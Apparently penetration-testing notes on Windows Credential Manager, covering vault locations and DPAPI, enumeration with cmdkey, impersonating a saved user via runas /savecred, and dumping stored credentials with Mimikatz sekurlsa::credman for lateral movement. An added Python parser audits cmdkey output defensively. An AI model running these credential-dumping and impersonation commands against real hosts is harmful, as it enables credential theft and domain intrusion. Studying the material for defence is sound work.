Windows Credential Manager
- Credential Manager (since Windows 7/2008 R2) stores saved credentials for apps, websites, networks, and services.
- Credentials are saved in Vaults (also called Credential Lockers) and encrypted with DPAPI.
Storage Locations:
- %UserProfile%\AppData\Local\Microsoft\Vault\
- %UserProfile%\AppData\Local\Microsoft\Credentials\
- %ProgramData%\Microsoft\Vault\
- %SystemRoot%\System32\config\systemprofile\AppData\...
Each vault includes a Policy.vpol file with AES-128/256 keys, protected by DPAPI.
Newer systems may use Credential Guard to prevent dumping.
Credential Types:
| Name | Used For |
|---|---|
| Web Credentials | Websites (used by IE and older Edge) |
| Windows Credentials | Logins for network shares, OneDrive, RDP, etc. |
Enumerate saved credentials
```
cmdkey /list

# Example output:
Target: Domain:interactive=CORP\phpheker
Type : Domain Password
User : CORP\phpheker
```
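The `cmdkey /list` output above is plain text with one `Target`/`Type`/`User` group per entry. The following is an added Python example (not part of the original notes) that parses that output into records and sorts them into the categories the notes use: `Domain Password` entries of the `Domain:interactive=` form (the ones `runas /savecred` consumes), other `Domain Password` entries bound to a service target, generic entries, and the `virtualapp/didlogical` noise. An administrator reviewing a host can feed it a captured `cmdkey /list` and see at a glance which saved domain logons persist there. The sample output, the `CORP` account and host names, and the category labels are all constructed for this example.

```python
from __future__ import annotations

import re
from dataclasses import dataclass, field

# Constructed sample of `cmdkey /list` output; not captured from a real host.
# The virtualapp/didlogical entry is the system-generated noise mentioned in the notes.
SAMPLE_CMDKEY_OUTPUT = """\
Currently stored credentials:

    Target: Domain:interactive=CORP\\phpheker
    Type: Domain Password
    User: CORP\\phpheker

    Target: WindowsLive:target=virtualapp/didlogical
    Type: Generic
    User: 02dcefghijklmnop
    Local machine persistence

    Target: Domain:target=TERMSRV/fileserver01
    Type: Domain Password
    User: CORP\\svc_backup

    Target: LegacyGeneric:target=git:https://github.com
    Type: Generic
    User: phpheker
"""

# Matches "Target: x", "Type : x", "User: x". cmdkey prints "Type:" without a
# space, but some captures (like the one in the notes above) show "Type :".
FIELD_RE = re.compile(r"^(Target|Type|User)\s*:\s*(.*)$", re.IGNORECASE)

# Well-known system-generated entries that are not real user credentials.
IGNORABLE_TARGETS = ("virtualapp/didlogical",)


@dataclass
class StoredCredential:
    target: str
    cred_type: str = ""
    user: str = ""
    flags: list[str] = field(default_factory=list)  # e.g. "Local machine persistence"

    def category(self) -> str:
        """Classify the entry the way the notes above do (labels are our own)."""
        t = self.target.lower()
        if any(noise in t for noise in IGNORABLE_TARGETS):
            return "ignorable"
        if self.cred_type.lower() == "domain password":
            # "Domain:interactive=" entries are what `runas /savecred` picks up.
            return "domain-interactive" if "interactive=" in t else "domain-service"
        return "generic"


def parse_cmdkey_list(text: str) -> list[StoredCredential]:
    """Parse the text of `cmdkey /list` into StoredCredential records."""
    entries: list[StoredCredential] = []
    current: StoredCredential | None = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        m = FIELD_RE.match(line)
        if m:
            key, value = m.group(1).lower(), m.group(2).strip()
            if key == "target":
                current = StoredCredential(target=value)
                entries.append(current)
            elif current is not None and key == "type":
                current.cred_type = value
            elif current is not None and key == "user":
                current.user = value
        elif current is not None:
            # Any other non-empty line inside an entry (after the header) is a flag line.
            current.flags.append(line)
    return entries


def audit(text: str) -> dict[str, list[str]]:
    """Group stored-credential targets by category for review."""
    report: dict[str, list[str]] = {}
    for cred in parse_cmdkey_list(text):
        report.setdefault(cred.category(), []).append(cred.target)
    return report


if __name__ == "__main__":
    for category, targets in sorted(audit(SAMPLE_CMDKEY_OUTPUT).items()):
        print(f"{category}:")
        for target in targets:
            print(f"  {target}")
```

Run it against `cmdkey /list > creds.txt` collected from a host and review anything reported under `domain-interactive` or `domain-service`; saved logons that should not persist can be removed with `cmdkey /delete`.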
Impersonate a stored user
```
# Get a new shell as phpheker if credentials are valid.
runas /savecred /user:CORP\phpheker cmd
```
Extract Credentials with Mimikatz
Dump Credential Manager entries from memory:
```
privilege::debug
sekurlsa::credman
```
Example Output:
```
User Name : phpheker
Domain : CORP
Logon Server: DC01
credman:
 * Username : phpheker@company.local
 * Domain : onedrive.live.com
 * Password : Coffee123!
```
More tools for Vault/DPAPI extraction:
- Mimikatz
- SharpDPAPI
- LaZagne
- DonPAPI
- Credentials like virtualapp/didlogical are safe to ignore.
- Target interactive credentials for domain lateral movement.